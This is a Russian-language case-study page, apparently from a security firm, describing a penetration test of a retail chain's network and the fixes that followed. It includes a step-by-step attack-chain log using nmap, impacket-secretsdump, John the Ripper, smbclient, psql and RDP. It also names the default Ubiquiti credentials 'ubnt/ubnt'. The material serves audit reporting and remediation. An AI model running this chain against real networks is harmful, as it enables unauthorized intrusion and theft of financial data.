NoMadStackEST. 2026
001Кейс · аудит безопасности

Аудит безопасности розничной сети

Полный пентест и hardening сети из 25+ устройств: 6 торговых точек, 2 офиса, центральный сервер 1С, 13 IP‑камер, радиомост. Владелец не знал реального состояния инфраструктуры.

16
уязвимостей
9 критичных · 5 высоких · 2 средних
25+
устройств в сети
серверы, кассы, камеры, рабочие станции
5 мин
от Wi-Fi до полного контроля
подтверждённая цепочка атаки
5 дней
разведка → пентест → отчёт
удалённо + один выезд на место
Главная угроза, подтверждённая практически

Любой посетитель магазина, подключившись к гостевому Wi-Fi, получает полный контроль над сервером 1С, всеми базами данных, бухгалтерией и кассами за 5 минут. Незаметно для сотрудников, параллельно с работой кассиров.

Общая оценка безопасности: КРИТИЧЕСКАЯ
002Масштаб

Что под угрозой в цифрах

Оценить масштаб помогают конкретные объёмы данных, к которым атакующий получает доступ за 5 минут — без специальных знаний и без следов в логах.

15 ГБ
PostgreSQL базы под угрозой
4 655 таблиц: продажи, бухгалтерия, ЕГАИС
20+ ГБ
файлы 1С на SMB-шарах
RetailKond + Retail — обе живые, обновляются ежедневно
22 ГБ
бэкапы и токены
лежат на диске без шифрования и контроля доступа
11 учёток
Windows-пользователей
3 без пароля, 3 со слабым (вскрыты за < 1 сек)
003Методология

Как тестировали

Тестирование выполнено по стандартам OWASP и PTES в три фазы. Платформа атакующего — Kali Linux 2026.1 в изолированном LXC-контейнере. Каждая находка подтверждена практическим PoC — никаких «теоретических рисков».

Фаза 01

Black Box

Сканирование извне (WAN IP), без инсайдерской информации. Проверка периметра

Nmap (TCP/UDP), Hydra (брутфорс по словарю)
Фаза 02

Gray Box

Проникновение во внутреннюю сеть с минимальным доступом. Перечисление ресурсов

Nmap (-sV -A), enum4linux, smbclient, CrackMapExec
Фаза 03

Exploitation

Эксплуатация уязвимостей, доказательство концепции (PoC)

impacket (SAM dump), John the Ripper, psql, RDP
004Цепочка атаки

От Wi-Fi до 1С за пять минут

Подтверждённый сценарий — от подключения к открытому Wi-Fi до полного контроля над инфраструктурой за 5 минут. Все команды реальные, конкретные значения замазаны.

attack-chain.log

# [00:00] Шаг 1 — подключение к гостевому Wi-Fi

Пароль известен посетителям, одна сеть с сервером 1С

# [00:30] Шаг 2 — обнаружение сервера

$ nmap -sV 192.168.x.0/24

↳ 40+ устройств, цель — S1C (37 LISTENING-портов)

# [01:30] Шаг 3 — подбор пароля администратора

$ impacket-secretsdump admin@S1C

$ john --format=NT sam-hashes.txt

↳ admin:**** вскрыт за 0.01 сек (4 цифры из SAM)

# [02:30] Шаг 4 — доступ к файлам через SMB

$ smbclient -L //S1C -U admin%****

↳ 8 шар: Users, RetailKond (6.3 GB), Retail (14.4 GB),

ADMIN$, C$, D$, E$, print$ — полный доступ

# [03:30] Шаг 5 — захват PostgreSQL

$ psql -h S1C -U postgres -d Retail

Password: ******

↳ Retail: 15 GB / 4 655 таблиц / роль SUPERUSER

# [04:00] Шаг 6 — RDP на сервер

$ rdesktop S1C # NLA выключена → прямой login

↳ Захват рабочего стола сервера

# [04:30] Шаг 7 — вход в 1С под безпарольным пользователем

$ start 1cv8c.exe ENTERPRISE /S RetailKond /N"Кондитер"

↳ ПОЛНЫЙ ДОСТУП: продажи, склад, финансы, администрирование

# [05:00] ВРЕМЯ < 5 минут от подключения к Wi-Fi

Незаметно. Параллельно с кассирами. Без следов в логах.

005Артефакты

Что было получено в руки

Каждая уязвимость подтверждена реальным выводом инструмента, а не предположением. Ниже — три ключевых артефакта (значения замазаны для публикации).

артефакт #1 · nmap-scan.txt · 37 LISTENING-портов на сервере

PORT SERVICE РИСК

22 SSH Удалённый доступ

80 HTTP Веб-сервер

135 RPC Windows RPC

445 SMB Файловые шары

1540-41 1С Сервер Управление 1С

1561-64 1С Рабочие Рабочие процессы 1С

3389 RDP Рабочий стол

5432 PostgreSQL База данных

7070 AnyDesk Удалённый доступ

8080 HTTP-proxy Веб-прокси

... и ещё 27 портов

артефакт #2 · sam-cracked.txt · john the ripper, без словаря

Аккаунт NTLM-хеш Пароль Время

─────────────────────────────────────────────────────

admin (Админ!) <NTLM hash> **** <1 сек

user-2 <NTLM hash> **** <1 сек

1cv8 (Админ 1С!) <NTLM hash> ****** <1 сек

Администратор — [ПУСТО]

Гость — [ПУСТО]

DefaultAccount — [ПУСТО]

# 3 пароля вскрыты, 3 учётки вообще без пароля

артефакт #3 · postgres-access.log · полный SUPERUSER к финансам

$ psql -U postgres -h S1C -d Retail

Password: ******

# внутри БД

Retail=# SELECT datname, pg_size_pretty(pg_database_size(datname)) FROM pg_database;

datname | pg_size_pretty

-----------+----------------

Retail | 15 GB ← ВСЯ бухгалтерия, продажи, ЕГАИС

postgres | 7825 kB

Retail=# \du

postgres | SUPERUSER | права: всё, включая DROP DATABASE

# pg_hba.conf:

host all all 0.0.0.0/0 md5 ← подключения отовсюду

006Находки

Все 16 уязвимостей

Полный список с CVSS-оценкой, отсортирован по критичности. Каждая подтверждена практическим PoC.

V-01
Нет сегментации сети — гостевой Wi-Fi и LAN в одной подсети
Любой посетитель видит сервер, кассы, камеры
CVSS 10.0
V-02
Пароль администратора Windows из 4 цифр
Вскрывается за 0.01 сек из SAM-хеша
CVSS 9.8
V-03
PostgreSQL слушает на 0.0.0.0, суперпользователь со слабым паролем
Полный доступ к 15 ГБ финансовых данных
CVSS 9.8
V-04
Аккаунты Windows без пароля (Администратор, Гость, DefaultAccount)
Вход без аутентификации
CVSS 9.1
V-05
SMB-шары с базами 1С доступны по сети
Скачивание / подмена живых баз 1С
CVSS 9.0
V-06
37 портов открыты на 0.0.0.0 (RDP, SMB, PostgreSQL, 1С)
Множество векторов атаки, нет фильтрации
CVSS 8.5
V-13
RDP открыт, NLA выключена — захват рабочего стола из Wi-Fi
Прямой захват сервера
CVSS 9.0
V-14
Финансовые данные доступны одним SQL-запросом
Месячная выручка вытаскивается за секунду
CVSS 9.0
V-15
Сервер 1С: 9 пользователей без паролей, админ-кластер не защищён
Вход в учётную систему под любым именем
CVSS 9.0
V-07
AnyDesk без пароля, сервис запущен
Зная ID — доступ из любой точки мира
CVSS 7.5
V-08
Windows 10 без обновлений 8+ лет (build 2017 года)
Уязвим для всех известных CVE
CVSS 7.0
V-12
Бэкапы баз 1С, токены оплаты, архивы — без шифрования
22 ГБ доступны для копирования
CVSS 7.0
V-16
Параллельно работают 3 средства удалённого доступа
Несколько путей атаки, потеря контроля
CVSS 7.0
V-09
Файрволл включён, но не фильтрует LAN-трафик
Атака с гостевого Wi-Fi не блокируется
CVSS 6.5
V-10
Радиомосты Ubiquiti с дефолтным паролем `ubnt/ubnt`
Перехват трафика между зданиями
CVSS 6.0
V-11
Wi-Fi пароль простой и открыто известен посетителям
Точка входа в сеть для любого гостя
CVSS 5.0
007Работы

Что сделали

Не «список проблем», а рабочие изменения в инфраструктуре + готовый инструментарий для дальнейших шагов клиентом.

SSH-доступ по ключу

Установлен SSH с авторизацией по ключу, отключён вход по паролю из внешней сети. Удалённое обслуживание стало возможным и безопасным

Сегментация Wi-Fi в кофейне

Заменён бытовой роутер с двойным NAT на промышленный TP-Link AX1500 в режиме AP. Создано 2 сети: рабочая (скрытая, для кассы) + гостевая (изолированная, без доступа к LAN)

Устранение двойного NAT

Сетевая архитектура с двумя NAT приводила к нестабильности эквайринга (PAX D230 терял связь). Заменён на корректный AP-режим — эквайринг стабилизировался

Карта сети

Полная Mermaid-диаграмма 25+ устройств с топологией, IP, ролями, зависимостями. Теперь видно «что где стоит»

Резервации DHCP

Критичные устройства (касса, эквайринг, iPad) получили постоянные IP — не зависят от перезагрузки роутера

Пентест-отчёт + план

16 уязвимостей с CVSS, пошаговая цепочка атаки, артефакты PoC. План исправлений на 2 недели — приоритизация по критичности

008План

Исправления — 2 недели

Приоритизированный roadmap. Сначала закрываются критические дыры (1-3 день), затем устойчивость инфры (4-10 день), затем долгосрочные улучшения.

Дни 1-3 · СРОЧНО
  • Сегментация Wi-Fi: VLAN или отдельный AP для гостей
  • Смена всех слабых паролей (admin Windows, postgres, 1cv8, AnyDesk)
  • Закрыть PostgreSQL (listen 127.0.0.1 + pg_hba LAN-only)
  • Установить пароли на 9 пользователей 1С
  • Включить NLA для RDP
Дни 4-10 · УСТОЙЧИВОСТЬ
  • Закрыть 37 → 5 портов (firewall: оставить только нужные)
  • Обновление Windows (поэтапно с 2017 build до актуального)
  • Сменить пароли на радиомостах Ubiquiti, обновить прошивку
  • Шифрование бэкапов на диске G:, перенос на отдельное хранилище
  • Удалить лишние RDP-инструменты (оставить один — Thinstuff)
Дни 11-14 · ДОЛГОСРОЧНОЕ
  • Мониторинг (Uptime Kuma) с алертами в Telegram
  • Автоматические бэкапы баз 1С с проверкой целостности
  • Документация: smart-cards для сотрудников (что делать при инциденте)
  • Восстановление паролей на видеорегистраторах NVR

«Не знал что всё настолько плохо. Теперь понимаю что нужно делать и в каком порядке.»

Владелец сети, апрель 2026

Похожая ситуация у вас?

Если в инфраструктуре давно не было аудита — есть риск, что цепочка атаки выше повторяется в вашей сети. Проверим без лишних слов: разведка → отчёт с PoC → план исправлений с приоритетами.

Обсудить аудит →